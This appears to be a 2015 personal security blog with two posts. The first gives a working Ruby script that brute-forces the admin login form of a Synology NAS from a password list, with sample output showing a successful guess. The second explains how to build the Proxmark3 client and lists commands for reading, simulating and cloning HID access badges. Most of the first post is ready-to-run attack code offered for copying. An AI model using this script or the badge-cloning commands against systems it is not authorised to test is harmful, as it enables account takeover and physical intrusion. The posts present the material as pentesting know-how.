Thursday, January 29, 2015

Writing a web form bruteforcer in Ruby

Testing weak credentials on web application or devices that use web form authentication is a very common and popular thing to do during pentests. A lot of times, you'll come across a device and the only way to interact with the device is via the web interface. A web interface that commonly requires authentication via submitted form fields.

I decided I wanted to write my own bruteforcer for a Synology NAS I happen to have on hand. Now people commonly suggest using Nokogiri to interact and parse webpages. Thats all fine and dandy for the simpler/more straightforward webcode, but when you start getting into web2.0 stuff or if you just dont want to deal with it, I've found that Mechanize helps tremendously.

Below is the final code i came up with. It's fairly simple. It takes in a file called "passlist.txt" which will be the password dictionary file, and for every password in that file it will attempt a login to the login webpage. It will detect the returned response body for a success or failure. (this is mainly meant as a PoC, not as a tool)

require 'rubygems'
require 'mechanize'
#this script will brute force the web form login for a synology nas

passwordlist = File.open("passlist.txt")
agent = Mechanize.new{|a| 
    a.verify_mode = OpenSSL::SSL::VERIFY_NONE
    #a.set_proxy('localhost',8080)
    }
target = 'https://NASIPHere:5001/webman/index.cgi'
user = 'admin'

passwordlist.each do |password|
    page  = agent.get target

    # Fill out the login form
    form          = page.form_with :id => 'login-form'
    form.username = user
    form.passwd   = password.chomp #this is important otherwise the newline will break the auth and everything fails
    result = form.submit

    case
    when result.body =~ /"success" : false/ then puts "Failure with #{password}"
    when result.body =~ /"success" : true/ then puts "SUCCESSFUL LOGIN WITH #{password}"
    else puts "Unknown response body when using \"#{password}\": #{result.body}"
    end
end

Running the script yields the following output:

ruby synology-web-form-brute.rb
Failure with admin
SUCCESSFUL LOGIN WITH yoloswag
Failure with kittens

Again, this is not meant to be fancy/groundbreaking/or anything other than some code to copy and paste if you need to.

(There are a variety of tools that will do the same thing or a very similar attack much faster than this, such as hydra/medusa/burp/etc.)

Tuesday, January 6, 2015

Getting the Proxmark3 working

I recently got a proxmark3 for RFID testing and had to get the environment set up properly. I downloaded the precompiled client tools the manual suggests, but it kept asking for a specific version of GLIBC which i could not find packages for for the life of me. I ended getting their source code off their github and compiling the client tools right there. Works perfectly.

1. Download the 64bit version of kali
2. Set up a virtual machine (or install to disk) with kali on it
3. git clone https://github.com/Proxmark/proxmark3
4. cd into the proxmark3/client directory
5. run make to compile the files
6. call the client interface with ./proxmark3 /dev/ttyACM0 (or whatever device it shows up as for you)


Now it should drop you into the proxmark3 interactive shell. Here you can do things like read basic corporate badges with 'lf hid fskdemod' or play it back with 'lf hid sim codehere' or clone the cards onto physical T55x7 cards.

In any case, here are some important links:
Source: https://github.com/Proxmark/proxmark3
Proxbrute and other utilities: http://www.mcafee.com/us/resources/white-papers/foundstone/wp-proxbrute.pdf
Github Wiki: https://github.com/Proxmark/proxmark3/wiki/commands
User Manual (for my version): http://ryscc.com/products/PM3PRD/dl/PM3-UserGuide-20140401.pdf